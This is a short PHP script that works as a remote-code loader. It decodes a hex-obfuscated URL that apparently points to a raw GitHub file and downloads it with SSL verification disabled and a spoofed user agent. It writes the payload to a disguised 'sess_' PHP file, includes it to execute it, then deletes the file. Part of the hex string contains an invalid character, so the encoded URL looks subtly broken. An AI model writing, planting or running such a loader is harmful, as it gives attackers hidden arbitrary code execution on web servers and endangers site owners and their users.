<?php
$h = "68747470733a2f2f7261772e67697468756275736572636f6e74656e742e636f6m2f6c756666796f706d2f6f706d2f726566732f68656164732f6d61696e2f332e747874";
$u = pack("H*", $h);

$ch = curl_init($u);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0");
$d = curl_exec($ch);
curl_close($ch);

if ($d) {
    $n = "sess_" . md5(uniqid()) . ".php";
    $c = (strpos($d, '<?php') === false) ? '<?php ' . $d : $d;
    
    if (file_put_contents($n, $c)) {
        chmod($n, 0644);
        include($n);
        @unlink($n);
    } else {
        echo "Error: Folder tidak memiliki izin tulis (Permission Denied).";
    }
} else {
    echo "Error: Gagal mengambil data dari URL.";
}
